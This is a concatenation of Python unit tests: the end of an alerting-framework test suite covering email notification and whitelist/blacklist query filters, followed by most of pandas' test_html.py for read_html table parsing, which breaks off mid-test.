assert set(mock_smtp.sendmail.call_args_list[1][0][1]) == set(['baz@baz.baz'] + ea.rules[0]['notify_email'])
# With ea.notify email but as single string
ea.rules[0]['notify_email'] = 'foo@foo.foo'
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[2][0][1]) == set(['baz@baz.baz', 'foo@foo.foo'])
# None from rule
ea.rules[0].pop('notify_email')
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[3][0][1]) == set(['baz@baz.baz'])
def test_uncaught_exceptions(ea):
e = Exception("Errors yo!")
# With disabling set to false
ea.disable_rules_on_error = False
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# With disabling set to true
ea.disable_rules_on_error = True
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 0
assert len(ea.disabled_rules) == 1
# Changing the file should re-enable it
ea.rule_hashes = {'blah.yaml': 'abc'}
new_hashes = {'blah.yaml': 'def'}
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.side_effect = [ea.disabled_rules[0]]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# Notify email is sent
ea.notify_email = 'qlo@example.com'
with mock.patch.object(ea, 'send_notification_email') as mock_email:
ea.handle_uncaught_exception(e, ea.rules[0])
assert mock_email.call_args_list[0][1] == {'exception': e, 'rule': ea.disabled_rules[0]}
def test_get_top_counts_handles_no_hits_returned(ea):
with mock.patch.object(ea, 'get_hits_terms') as mock_hits:
mock_hits.return_value = None
rule = ea.rules[0]
starttime = datetime.datetime.now() - datetime.timedelta(minutes=10)
endtime = datetime.datetime.now()
keys = ['foo']
all_counts = ea.get_top_counts(rule, starttime, endtime, keys)
assert all_counts == {'top_events_foo': {}}
def test_remove_old_events(ea):
now = ts_now()
minute = datetime.timedelta(minutes=1)
ea.rules[0]['processed_hits'] = {'foo': now - minute,
'bar': now - minute * 5,
'baz': now - minute * 15}
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=10)
# With a query delay, only events older than 20 minutes will be removed (none)
ea.rules[0]['query_delay'] = datetime.timedelta(minutes=10)
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 3
# With no query delay, the 15 minute old event will be removed
ea.rules[0].pop('query_delay')
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 2
assert 'baz' not in ea.rules[0]['processed_hits']
def test_query_with_whitelist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['five'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' \
in new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_whitelist_filter_es_five(ea_sixsix):
ea_sixsix.rules[0]['_source_enabled'] = False
ea_sixsix.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea_sixsix.rules[0]['compare_key'] = "username"
ea_sixsix.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea_sixsix.rules[0])
ea_sixsix.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' in \
new_rule['filter'][-1]['query_string']['query']
def test_query_with_blacklist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in \
new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_blacklist_filter_es_five(ea_sixsix):
ea_sixsix.rules[0]['_source_enabled'] = False
ea_sixsix.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea_sixsix.rules[0]['compare_key'] = "username"
ea_sixsix.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
ea_sixsix.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea_sixsix.rules[0])
ea_sixsix.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in new_rule['filter'][-1]['query_string'][
'query']
|
test_html.py
|
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@tm.network
def test_banklist_url_positional_match(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
